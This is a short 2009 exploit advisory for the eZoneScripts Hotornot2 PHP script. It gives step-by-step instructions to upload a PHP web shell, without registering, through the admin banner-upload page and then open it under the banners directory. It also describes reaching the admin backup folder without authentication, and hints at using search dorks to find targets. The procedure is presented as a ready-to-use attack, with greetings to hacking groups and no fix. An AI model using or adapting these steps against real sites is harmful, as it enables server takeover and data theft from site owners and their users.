eZoneScripts Hotornot2 Script (Admin Bypass) Multiple Remote Vulns

2009-05-26 18:12:11

[+]
Hotornot2 Script (Remote apload) Admin Bypass Vulnerability

===== ++ by sniper code++============================================

Author : sniper code ( S.C.T-443 )
website : www.sec-code.com
===================================================================================================================
[+]
ScRipT : http://www.ezonescripts.com/scripts/sls/hotornot2.php
====================================================================================================================
[+]
Exploit:

GO to :
http://localhost/[path]/admin/sitebanners/upload_banners.php ( no need to registeration)

you will see (Upload banners)

( browse and select file like example : Shell.php) and press upload )
you can press View banners button to see and ensoure your file uploaded ...

then Go to :
http://localhost/[path]/banners/Shell.php ( will view the shell )

[+]
for bypassing admin backup :
Go to :
http://localhost/[path]/admin/backup

dork : use ur mind ^_^

Thats it . . .

===================================================================================================================
[+] Greetz to :

[»] MN9 - AL-H7ano0ty - AB0 3thaB -snake1095 - rxh
[»] JiKo, Crackerz child...
[=]all members of tryag.cc + sec-code.com

===================================================================================================================

#

Fixes

No fixes

In order to submit a new fix you need to be registered.